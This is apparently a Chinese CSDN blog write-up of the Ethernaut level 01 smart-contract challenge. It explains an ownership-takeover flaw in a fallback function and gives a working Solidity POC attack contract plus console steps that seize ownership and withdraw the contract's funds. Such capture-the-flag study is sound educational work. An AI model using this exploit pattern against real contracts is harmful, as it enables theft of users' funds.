Ethernaut 01

最新推荐文章于 2024-08-21 13:16:10 发布
最新推荐文章于 2024-08-21 13:16:10 发布
阅读量108 收藏
点赞数
分类专栏: blockchain 文章标签: 区块链
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/siritobla/article/details/126015843
版权

Ethernaut 01

基本思路:涉及敏感操作的权限控制漏洞——首先调用contribute函数发送1wei,然后直接发送1wei,从而绕过程序的逻辑缺陷,最终调用withdraw函数,取回所有币,成功过关

额外补充:本人自行编写的POC合约,在测试网上经过验证可以实现上述逻辑成功进行攻击

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract POC{
    address payable public victim;
    address public owner;
    constructor() payable {
        owner = msg.sender;
    }
    
    function setVictim(address victim_) public {
        victim = payable(victim_);
    }

    function getBalance() public view returns (uint256){
        return address(this).balance;
    }

    function step1_transfer() public {
        (bool success, bytes memory data) = victim.call{value: 1}(abi.encodeWithSignature("contribute()"));
        require(success==true , "call Fallback::contribute failed" );
    }

    function step2_transfer_and_getOwner() public {
        (bool success ,)= victim.call{value: 1}("");
        require(success==true, "send failed");
    }

    function step3_attack() public {
        
        (bool success, bytes memory data) = victim.call(abi.encodeWithSignature("withdraw()"));
        require(success==true , "call Fallback::withdraw failed" );

    }

    fallback() external payable {

    }
}

网上方法:

步骤1:contract.contribute({value:1})

步骤2:MetaMask直接发送1wei,此时我们已经成功拿到owner

步骤3:contract.withdraw()

本题小结:简单

siritobla
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ethernaut GateKeeperOne
love_wjk的博客
08-13 376
通关要求: 通过三个限制函数,以entrant身份注册。 题目源码 pragma solidity ^0.5.0; import 'openzeppelin-solidity/contracts/math/SafeMath.sol'; contract GatekeeperOne { using SafeMath for uint256; address public entrant; modifier gateOne() { require(msg.sender != tx.o
ethernaut-ctf-memo:Ethernaut CTF的一些备忘
05-12
ethernaut-ctf-memo Ethernaut CTF的一些备忘: ://ethernaut.zeppelin.solutions 等级 0.你好Ethernaut 1.后备 2.辐射 3.投币 4.电话 5.代币 6.委派 7.力量 8.金库 9.国王 10.再入 11.电梯 12.隐私权...
以太坊中常见的代码安全问题以及在Ethernaut平台解题的演示
不思量
11-11 3515
下面列出了已知的常见的 Solidity 的漏洞类型:
智能合约 - Ethernaut Game(上)
dengzhasong7076的博客
07-31 476
学习一下区块链相关的知识,拿一个game练手一下。[game地址](https://ethernaut.zeppelin.solutions/) Hello Ethernaut 1、安装以太坊的轻钱包MetaMask 关于MetaMask如何使用可以(参考这篇)[http://8btc.com/thread-76137-1-1.html] 选择ropsten test network,测...
Ethernaut
m0_52030813的博客
11-05 344
1.Hello Ethernaut 分析 第一关更多的是让玩家熟悉靶场的一些语句执行,相当于一个教程,我们根据题目指示往下走即可。 攻击 首先点击关卡下方的按钮,生成新的关卡实例。 实例生成之后打开浏览器控制台(ctrl+shift+i)。根据题目指示,首先输入await contract.info(),随后根据得到的提示一步步往下做。 做到这一步,提示告诉我们如果知道密码就提交到authenticate这个方法,我们输入contract查看合约信息,发现代码中有password函数可以
ethernaut
qq_41578716的博客
01-03 1069
首先,准备工作 1、下载好matemask获取免费的测试以太网,大佬告诉本菜说可以点击matemask以太币不够可以重新申请一个账号(放心现在申请肯定不会很麻烦一键式操作)之后点击存入—获取,之后狂点获取按钮。 2、你需要懂智能合约的基础,以及web3.js和操作码的执行方式(当然懂了合约也可以慢慢的做下去,毕竟这个靶场就是给人熟悉合约以及其漏洞的) 0.Hello Ethernaut 这个级别目...
Ethernaut 00
siritobla的博客
07-27 235
Ethernaut Writeup
ethernaut——NaughtCoin
2301_78046362的博客
05-20 133
本合约继承了erc20合约,那么我们可以阅读ERC20合约查看可以不用本人直接转账,采用授权给其他人的方法,来提出token。所以,在我们阅读合约的过程中,对继承的合约,或者常见的合约类型进行分析是很重要的一点!切换账户后transferFrom发送所有的token给自己。
Ethernaut 03
siritobla的博客
07-28 2728
Ethernaut Writeup
ethernaut——Telephone
2301_78046362的博客
05-14 85
【代码】ethernaut——Telephone。
ethernaut:Web3基于固体的战争游戏
04-28
Ethernaut Ethernaut是一个基于WEB3 /密实度的战争游戏中启发 ,在复仇虚拟机进行播放。 每个级别都是一个需要被“破解”的智能合约。 该游戏既充当有兴趣学习以太坊的人的工具,又是按等级分类历史骇客的一种方式...
ethernaut-ctf:Ethernaut CTF解决方案(https
03-31
醚瑙ctf 基于 ...安装依赖项 运行npm install来安装Ganache-cli和Truffle 用法 使用npx ganache-cli --port 7545在端口7545上启动ganache-cli 将合同部署到运行npx truffle migrate本地区块链 使用npx truffle exec ...
2024新型数字政府综合解决方案(五)
绿茵场的激情
08-16 347
新型数字政府综合解决方案通过集成人工智能、大数据、区块链和云计算技术,打造了一个智能化、透明化和高效的政务服务平台,旨在提升政府服务的响应速度、处理效率和数据安全性。该方案实现了跨部门的数据共享与实时更新,通过智能化的流程自动化和精准的数据分析,优化了政务管理和公共服务,同时增强了决策的科学性和政策的针对性。此外,平台支持多渠道的市民互动,简化了办事程序,提高了办事便利性,并通过区块链技术确保数据的不可篡改和隐私保护,从而推动政府治理的现代化和公众满意度的提升。
个股场外期权是什么?个股场外期权个人怎么交易?
qiquandong的博客
08-19 284
今天带你了解个股场外期权是什么?个股场外期权个人怎么交易?场外个股期权是一种具有高风险高杠杆的金融衍生品,对于投资者的要求比较高。
2024新型数字政府综合解决方案(八)
绿茵场的激情
08-16 252
新型数字政府综合解决方案结合人工智能、大数据、区块链与云计算等先进技术,旨在构建一个智能、高效、透明的政务服务体系,通过全面整合各部门的信息资源,实现数据的实时共享与高效管理,从而大幅提升政府应对复杂社会问题的能力;此外,区块链技术的引入,确保了数据的安全性和透明性,强化了公众对政府信息的信任,在提高政府服务质量的同时,促使市民积极参与社会治理,最终实现数字化转型与可持续发展的战略目标。
SOL项目开发代币DApp的基本要求、模式创建与海外宣发策略
最新发布
Lovely_xwys的博客
08-21 921
通过扎实的技术架构、安全的合规性设计,以及多渠道的市场推广,项目不仅可以在本地市场取得成功,还能在全球范围内建立起广泛的用户基础和品牌知名度。代币的使用场景应明确,能为用户提供实际价值,如用于支付、抵押、治理或参与平台内的其他活动。NFT集成: 利用Solana的快速交易优势,开发NFT市场或与NFT相关的应用,增加代币的应用场景,吸引更多创作者和用户进入生态系统。用户数据保护: 在开发过程中,必须严格保护用户数据的隐私,并遵守相关的国际数据保护法规,如GDPR,确保项目在全球范围内的合法性。
区块链:共享经济发展的创新驱动力》
xy520521的博客
08-18 577
区块链技术作为一种创新的技术手段,为共享经济的发展注入了新的活力。随着技术的不断进步和应用场景的不断拓展,相信区块链技术将在共享经济领域发挥更加重要的作用,推动共享经济向更加高效、公平和可持续的方向发展。同时,区块链的跨境支付功能可以消除传统金融机构之间的繁琐手续和高额费用,实现资金的快速、低成本转移,为共享经济的全球化发展提供了有力支持。例如,区块链技术的普及和应用需要一定的技术门槛和成本投入,目前的区块链技术在处理大规模交易时的性能还有待提高,相关的法律法规和监管政策也还不够完善。
fabric 2.5 使用jar安装Java合约(解决Fabric安装Java链码速度慢的问题)
ALONG的博客
08-21 238
fabric2.5版本使用Jar安装合约。包括打包、安装、批准、提交链码流程,最后执行链码的方法。
区块链+金融服务】第一创业证券开发银行间报价 Dapp | FISCO BCOS应用案例
FISCO_BCOS的博客
08-16 278
第一创业证券基于 FISCO BCOS 区块链底层平台进行了有益的探索。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值